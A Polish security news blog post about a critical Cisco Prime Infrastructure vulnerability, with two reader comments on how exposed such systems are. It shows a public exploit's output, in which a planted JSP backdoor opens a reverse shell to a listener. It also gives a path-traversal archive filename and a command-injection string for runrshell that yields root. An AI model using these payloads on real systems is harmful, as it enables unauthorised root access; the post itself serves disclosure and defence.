Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Cisco Prime Infrastructure – można dostać uprawnienia root bez uwierzytelnienia

18 maja 2019, 17:08 | W biegu | komentarze 2

Łata od Cisco tutaj. Krytyczność podatności to aż 9.8/10 w skali CVSS. Ale możliwość uzyskania dostępu na system operacyjny i później łatwa eskalacja uprawnień do roota to jest coś. Działanie dostępnego już exploitu:

$ ./poc.py 192.168.100.123 192.168.100.2:4444
(+) planted backdoor!
(+) starting handler on port 4444
(+) connection from 192.168.100.123
(+) pop thy shell!
python -c 'import pty; pty.spawn("/bin/bash")'
[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
sh-4.1# /usr/bin/id
/usr/bin/id
uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
sh-4.1# exit

Jaka jest istota podatności? Mamy tutaj dwa problemy – pierwszy to możliwość anonimowego uploadu spakowanego do .tar pliku .jsp – ale trzeba wykorzystać dodatkowy trick: nazwa pliku w archiwum musi „wyjść” do odpowiedniego katalogu. Pakujemy więc: ../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp

W skrócie, możemy nasz backdoor w .jsp wypakować do niemal dowolnego katalogu na serwerze (jeśli ktoś chce w pełni prześledzić ten trick, zachęcam do zerknięcia na podatność nr 1 z naszego publicznego raportu z pentestów).

Później już tylko banalna eskalacja uprawnień do roota w poleceniu runrshell: /opt/CSCOlumos/bin/runrshell '” && /bin/sh #’  i voila:

sh-4.1# /usr/bin/id /usr/bin/id uid=0(root) gid=0(root)

–ms

 

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. c0t0d0s2

    Warto dodać, ze exploit/podatność jest do wykonania/wykorzystania tylko z sieci zarządzania, co znacząco utrudnia jej wykorzystanie. Dobre praktyki i standardy konfiguracji wymagają odseparowania sieci produkcyjnej od sieci zarządzania.

    Odpowiedz
  2. razor

    Niekoniecznie. Akurat CPrime histuje w wielu firmach portal sponsora wifi donktorego z definicji jest szeroki dostęp.

    Odpowiedz

Odpowiedz